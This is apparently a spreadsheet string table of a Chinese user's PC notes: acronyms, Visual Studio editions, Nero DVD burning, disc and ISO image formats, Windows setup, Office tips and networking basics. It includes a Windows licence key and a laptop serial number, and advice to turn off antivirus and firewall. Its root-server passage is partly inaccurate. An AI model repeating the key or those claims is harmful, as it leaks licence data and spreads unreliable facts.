    <t>Me Windows Millennium Edition</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视窗操作系统千禧版</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WINS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows Internet Naming Service</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WWW</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>World Wide Web</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>万维网，全球广域网</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XGA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>eXtended Graphic Array</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扩充图形阵列</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XML</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>eXtensible Markup Language</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>与描述信息相关，而HTML与显示信息相关</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计算机英语缩略语</t>
  </si>
  <si>
    <t>microsoft visual studio</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Visual Studio 是微软公司推出的开发环境。是目前最流行的 Windows 平台应用程序开发环境。目前已经开发到 10.0 版本，也就是 Visual Studio 2010。 　　Visual Studio 可以用来创建 Windows 平台下的 Windows 应用程序和网络应用程序，也可以用来创建网络服务、智能设备应用程序和 Office 插件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>profession:</t>
  </si>
  <si>
    <t>Microsoft Visual Basic 2008</t>
  </si>
  <si>
    <t>Microsoft Visual C# 2008</t>
  </si>
  <si>
    <t>Microsoft Visual C++ 2008</t>
  </si>
  <si>
    <t>Microsoft Visual Studio 2008 Tools for Office</t>
  </si>
  <si>
    <t>Microsoft Visual Web Developer 2008</t>
  </si>
  <si>
    <t>Crystal Reports Basic for Visual Studio 2008</t>
  </si>
  <si>
    <t>如果是 Team System 的话再多：</t>
  </si>
  <si>
    <t>Microsoft Visual Studio Team System 2008 Architecture Edition</t>
  </si>
  <si>
    <t>Microsoft Visual Studio Team System 2008 Database Edition</t>
  </si>
  <si>
    <t>Microsoft Visual Studio Team System 2008 Development Edition</t>
  </si>
  <si>
    <t xml:space="preserve">Microsoft Visual Studio Team System 2008 Test Edition </t>
  </si>
  <si>
    <t>Visual Basic 2005</t>
  </si>
  <si>
    <t>Visaul C# 2005</t>
  </si>
  <si>
    <t>Visual C++ 2005</t>
  </si>
  <si>
    <t>Visual C$ 2005</t>
  </si>
  <si>
    <t>Visaul Web Developer</t>
  </si>
  <si>
    <t xml:space="preserve">SQL Server 2005 速成版(附带的) </t>
  </si>
  <si>
    <t>其中6.0版本包括：</t>
  </si>
  <si>
    <t>Microsoft Visual Basic</t>
  </si>
  <si>
    <t>Microsoft Visual C++</t>
  </si>
  <si>
    <t>Microsoft Visual FoxPro</t>
  </si>
  <si>
    <t>Microsoft Visual InterDrv</t>
  </si>
  <si>
    <t>Microsoft Visual J++</t>
  </si>
  <si>
    <t>Microsoft Visual SourceSafe</t>
  </si>
  <si>
    <t>Microsoft Windows NT 4.0 Option Pack For Windows NT</t>
  </si>
  <si>
    <t>Microsoft SQL Server Developer Edition</t>
  </si>
  <si>
    <t xml:space="preserve">Microsoft SNA Server Developer Edition </t>
  </si>
  <si>
    <t>Nero Burning ROM多区段DVD刻录</t>
  </si>
  <si>
    <t>1 刻录的速度不仅取决于刻录机，还取决于刻录盘片对于DVD刻录盘片，目前占据主流的使用比较广的仍然以4X居多，8X的和支持双层刻录的盘片目前还是比较少的。(刻录速度：DVD 1X:1385KB/S;CD 1X:150KB/S)</t>
  </si>
  <si>
    <t>高档盒装4X刻录盘有TDK、SONY、飞利浦它们的价格都在18元左右；</t>
  </si>
  <si>
    <t>稍便宜一些的4X盒装DVD刻录盘有Melody、新华、UNICON、JUMBO、理光其价格一般在9至10元；</t>
  </si>
  <si>
    <t>对于低档的刻录盘片如Happy、Kana、Aloha、飞育、数码多其价格仅在4元左右。</t>
  </si>
  <si>
    <t>3 第一次刻录</t>
  </si>
  <si>
    <t>3.1 选择DVD，DVD-ROM(UDF/ISO)；</t>
  </si>
  <si>
    <t>3.2 多重区段选项卡：启用多重区段光盘；</t>
  </si>
  <si>
    <t>3.3 新建；</t>
  </si>
  <si>
    <t>3.4 拖拉添加或复制粘贴添加文件；</t>
  </si>
  <si>
    <t>3.5 刻录；</t>
  </si>
  <si>
    <t>3.6 请插入光盘以写入（编译所需光盘：DVD R/RE,DVD DL,DVD-RAM）</t>
  </si>
  <si>
    <t>3.7 不是空白光盘，是否擦除？选择：是；</t>
  </si>
  <si>
    <t>3.8 开始快速格式化（速度比写入快，大概1分钟）</t>
  </si>
  <si>
    <t>3.9 开始刻录（278M刻录大概总用时3分钟）</t>
  </si>
  <si>
    <t>4 第二次追加数据刻录：</t>
  </si>
  <si>
    <t>4.1 选择DVD，DVD-ROM(UDF/ISO)；</t>
  </si>
  <si>
    <t>4.2 多重区段选项卡：继续多重区段光盘；</t>
  </si>
  <si>
    <t>4.3 刻录选项卡：如果勾选：“结束光盘（不可再写入）”，则下次刻录时不能再追加刻录了；</t>
  </si>
  <si>
    <t>4.4 插入光盘，拖拉添加或复制粘贴添加新文件（此时光盘中已有文件会显示在左边窗口中）；</t>
  </si>
  <si>
    <t>4.5 刻录；</t>
  </si>
  <si>
    <t>Nero Burning ROM多区段DVD刻录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘刻录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    盘片质量和价格：首先如果是好的盘片，那么一般都选择单碟盒装的，这样既可以防尘，又可以防刮伤。如果是散装的话，那么一定要仔细检查盘片是否有划伤；同时还要检查其印刷质量，表面颜色是否均匀，最外和最内围的镀膜是否完整，盘片的圆孔是否圆滑。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 设置刻录环境（避免电脑出现问题而导致废盘）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 关闭电源管理程序：电源选项---更改计划设置---更改高级电源设置：从不关闭显示器、不启用休眠、不关闭硬盘；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 取消屏保：个性化：屏保：无；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.3 关闭任务计划：附件-系统工具；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.4 关闭应用程序和网络连接,包括防毒软件、防火墙、IE、QQ等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>常见光盘格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>压缩标准</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可用于什么设备</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>其它简要</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD-ROM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD-ROM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD-Video</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD-DA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISO/UDF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VCD机+TV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>家用CD机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据格式文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频格式文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件转换为单轨
一个音频文件一个单轨</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电脑中所有文件格式都可以加入数据光盘，但只能用于PC读取，使用光盘文件的方法与硬盘一样；ISO\UDF是PC数据组织文件的格式，即光盘文件系统；不管是系统盘还是恢复盘，都是数据盘ROM，只能用于PC，启动盘只是在ROM数据盘中多了一个启动文件；数据光盘ROM除了启动盘外，都有多重区段选择；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Video CD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DAT(MPEGAV中），VCD素材必须符合MPEG-1 Video CD/PA或NTSL格式要求；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>标准的MPG、AVI，其他视频文件或流媒体文件RM、AVI不经转换则不能直接刻录为视频光盘；VOB，IFO，BUP文件（纯刻录软件如NERO+生成VOB、IFO、BUP结构文件的软件（会声会影））</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WAV,MPC,WMA,APE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>源文件格式（要求格式正确，参数相符）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ROM数据光盘文件采用ISO、UDF光盘文件系统组织数据；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频压缩标准：压缩的基本方法是：在单位时间内采集并保存每一帧信息，然后只存储其余帧相对第一帧发生变化的部分；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-4</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-2:SVCD,DVD,10Mb/s,704*480;数字广播电视；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-1:VCD 15Mb/S(数据传输率),352*240（每秒30帧的图像分辨率）;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件转换为视轨
图片（VCD2）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>所刻光碟用于什么设备上？用于不同设备上的光碟具有不同的数据结构；如CD唱片用于家用CD唱机；VCD片用于家用VCD机等；DVD片用于家用DVD等，ROM只用于电脑等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD唱片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD音乐光盘，是CD-DA格式，其光轨的特点是有一个区段、多条光轨（一个曲目对应一条光轨），每条光轨对应一首歌曲，没有目录结构；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VCD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是含有两种类型轨道的单一区段光盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 ISO9660数据轨道：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>存放的是播放VCD的系统文件，驱动程序以及播放流程信息选择菜单、静态图片，ISP9660数据轨道只有一个，位于第一轨，一般包含5个目标：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 CDI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 EXT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 系统文件和驱动程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 SEGMENT：选择菜单、静态图像；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 Audio：声音文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 视频轨道：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>第二轨道及以后的轨道（至多可用98个）以目录MPEGAV存放文件形式的视频片断（DAT文件）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>正常的DVD影碟有以下两个目标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 Video-TS:存储Video所有数据，包括音频、视频、字幕等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 VOB文件：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频目标文件，由视频、声音、字幕数据流组成，视频数据流是MPEG-2格式的；一个VOB文件可以包含一个主要视频数据流和几个多语种伴音和字幕；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 IFO文件：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Information,告诉DVD播放机浏览信息，比如音卡的开始时间，伴音流在哪？字幕在哪？VOB文件是电影本身，而相应的IFO文件把组成电影的各个片段有机地连接起来；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 BUP文件：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>技术指标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>压缩技术</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分辨率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>容量</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据流</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>音频格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>菜单</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多字幕</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多音频</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多视角</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG-2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>353*288</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>720*576</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>650M-700M</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.7G-17G</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.152MB/s</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1-9.8MB/s</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双声道立体声</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.1声道环绕立体声</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VCD1.0不支持，VCD2.0支持；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>支持</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不支持</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>支持，最多32种</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>支持，最多8种</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD和VCD的区别；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Backup,IFO文件的备份文件，IFO文件出错时，DVD播放机可以通过BUP得到信息；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 Audio-TS:预留给DVD-Audio目录，存放DVD-TS音频文件，但通常音频文件与视频文件都集中在一起，所以此文件件一般是空的；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RM和RMVB：realmedia variable bit rate,是RealNetwork公司制定的媒体文件格式，其中RMVB格式采用了更低的压缩比特率，生成的文件体积非常小，而画面质量却没有太大下降。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD-RW的使用限制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 只能被支持Multiread技术的光驱所支持（且24X以上）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 不能被大多数家用CD机和DVD机所识别和播放；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 读操作：最低强度的激光；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 擦操作：中等的激光，熔化数据记录层，将其恢复到晶体状态；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 写操作：最高强度的激光；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RW盘采用相变结晶材料，理论上可重复写入或刻录1000次左右；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘格式其它相关</t>
  </si>
  <si>
    <t>光盘格式其它相关</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC基础知识点</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC基础知识点</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘复制：
neroexpress---映像项目复制---复制整张DVD（原驱动器与目标驱动器要一致），用源光盘建立镜像文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个或多个硬盘文件做成一个映像文件：
    2.1 UltroISO---在“本地目录”中选择文件夹或文件拖动到“光盘目录”中---保存：目录、名称、类型；或目标文件或文件夹右击---UltroISO---添加到
    2.2 Nero ISO Burning---工具栏选择：Image Recorder---新建---刻录；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>将光盘全部内容制作成映像文件：
    3.1 Nero---备份---复制光盘---目标驱动器：Image Recorder---插入光盘---复制---保存：路径、名称；
    3.2 UltroISO-工具---制作光盘映像；或光驱右击---制作光盘映像；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分区映像文件：Ghost,用于数据备份或系统恢复；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>从映像文件中提取文件：
UltroISO---文件---打开---选择映像文件---打开---选择要提取的文件右击---提取到；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>提取引导文件：
6.1 从光盘提取：放入光盘---打开ＵltroISO---“启动光盘”菜单---从CD、DVD提取引导文件；
6.2 从保存在硬盘上的映像文件中提取：UltroISO---文件---打开---选择映像文件---打开---“启动光盘”菜单---保存引导文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在UltroISO虚拟光驱加载或弹出映像文件：虚拟光驱右击操作即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>为映像文件添加引导文件：
    打开映像文件---启动“光盘菜单”---加载引导文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>编辑映像文件
    UltroISO---打开映像文件，在”光盘目标“右侧的列表框中右击---新建、重命名；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>记录映像文件：Nero---备份---将映像文件刻录到光盘；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISO映像文件操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>映像文件又称映像文件，它采用与信息源（硬盘或光盘）文件系统完全相同的存储格式，能够真实地反映信息源的数据内容，逻辑结构、文件格式等特征。常的文件格式主要有ISO，IMG/CCD/SWB,BIN,NRG,CDI,NCD,C2D,VCD FCD,MCD,TAO.主要用于将软件或系统文件打包成映像文件，记录成光碟后用于安装，或者用于数据备份，恢复，光盘复制等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISO映像文件操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络连接设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统安装明细</t>
  </si>
  <si>
    <t>系统安装明细</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安全操作中心设置：包括防火墙、windows update、windows defender、UAC；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>桌面分辨率设置（如要生效需重启）；桌面图标、背景设置；开始菜单、通知区域设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统安装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统安装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>我接受许可条款，下一步；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>您想将windows安装在何处？选择分区，驱动器选项（高级）---格式化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>正在安装 windows;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主机板ID：30CE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BIOS版本：F.13（phoenix);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F8:高级启动项</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F9:光驱、硬盘启动顺序选择；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F10：BIOS setup option;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>vista正版注册码：89578-oem-7332157-00061;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HP产品型号（PN号）GX895PA#AB2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品序列号（SN号）2CE74401VD;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品基本配置：DV2623TX；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UUID:F719DEA0877D11DC B5B1C13C540C8100</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>彩影AntiARP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>拦截外部ARP攻击，拦截IP地址冲突，监测ARP：自动监测本机ARP缓存表：如发现网关MAC地址被恶意修改，可报警并自动修复，检测局域网内的网管软件，如P2P终结者、网络执法官、聚生网管；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统工具小软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Word</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>合并多个word文档</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>把所需要的文档合并的word文档放到一个文件夹ABC；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>新建一个word文档插入---ABC---选中全部---插入；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>合并多个word文档</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>保护页眉（页眉点不进去，插入---页眉---修改页眉是灰色）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设计页眉；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光标定位到文本区域的首行的开关位置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>页面布局---分隔符---分节符：连续，此时会自动产生一空行，可不用管它；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>审阅---保护文档---限制格式和编辑---编辑限制：勾选：仅允许在文档中进行此类编辑，在下拉箭头选择：填写窗体，在“选择节…”对话框中选择节1---启动强制保护---输入密码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果需修改页眉：审阅---保护文档---限制格式和编辑---停止保护---输入密码即可；（在各部分之间插入连续分节符，可实施对文档中正文不同部分的保护）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>上述保护比较脆弱，用专门的工具可破解；office图标---准备-限制权限---限制访问---下载IRM客户端设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>保护页眉</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>页面布局纵横</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>第一页纵向，第二页横向</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>第一页有页眉，第二页无页眉</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>页面布局纵横</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word选项---加载项---com加载项---转到---一些不必要的加载项勾选</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Nokia-test</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试显示器；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Everest Ultimate</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可全面测试PC的软硬件资源，在工具栏内可测试显示器性能，有绿色版和安装版；工具---系统稳定性测试---CPUID;Everest Ultimate集合了CPU-Z &amp;Nokia-test的功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU-Z</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检测CPU，主板生产日期等参数，内存等，绿色软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>本工作簿其他工作表的某一单元格；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插入---超链接---本文档中的位置---或在这篇文档中选择位置：选择工作表---请键入单元格引用，选择单元格；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>本电脑中的其他文档</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插入---超链接---原有文件或网页---查找范围；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网页：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插入---超链接---原有文件或网页---地址</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注：插入---超链接---书签：一个新的对话框，相当于前面两个方式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络基础</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>internet的主根服务器在美国的费吉尼亚州的杜勒斯，由美国的VeriSign公司负责运营维护，其下是12个辅根服务器，在9个放在美国，分别由8个不同的军事与教育机构运营维护（2台由美军使用，1台由美国家航空航天局使用），其余3台在英、日、瑞典，这13台根服务器统一由美商务部下的ICANN管理。负责决定互联网技术的取舍，网络通信协议的制定，IP地址、域名的分配、登记、出售及相关政策；
中国的顶级域名CN的信息就保存在根服务器中，如果此信息在根服务器上被删，则中国马上会成为网上孤岛。
所以以前的美国是世界警察，而现在又成了超级世界网管；
IPV4只有43亿个IP地址，目前剩下7亿个；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>流媒体技术：用于实现网上音频、视频实时同步传输，流媒体在播放时并不下载整个文件，只将开始部分存入内存，PC对数据包进行缓存并使媒体数据正确地输出，其工作原理是将整个音频和视频及三维媒体等多媒体文件经过特定的压缩方式解析成一个个压缩包，由视频服务器顺序或实时传送，使数据流随时传送随时播放，只是在开始时因要为进行相应的文件和系统处理才有些迟延，王府下的将在后台从服务器继续下载，包括编码器（编码技术），播放器（播放支持），和流服务器；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TreeSize Free</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分析各文件夹的大小；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Msocache文件夹</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
